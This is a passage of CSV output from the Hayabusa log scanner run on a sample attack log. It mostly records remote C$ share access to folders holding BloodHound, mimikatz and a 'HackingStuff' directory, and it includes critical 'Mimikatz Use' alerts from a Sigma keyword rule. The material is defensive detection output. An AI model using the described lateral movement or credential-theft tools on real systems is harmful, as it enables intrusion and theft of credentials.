10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\example : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray\test\server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\unzipper : IP 
Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.419 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\dist\esnext : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.429 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\src\schemes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uri-js\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\util-deprecate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.439 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\uuid\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\voc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\warning : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.449 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\wrappy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\write-file-atomic : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.459 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\xlsx\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.469 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.479 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Float : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Menu : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Modals : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.489 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\SearchContainer\Tabs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.499 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Spotlight : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\components\Zoom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\css : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\fonts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.509 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\img : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 
+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\src\js : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.519 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\HackingStuff\logs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 
23:23:25.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.529 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.539 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.549 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.559 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games : IP Address: 
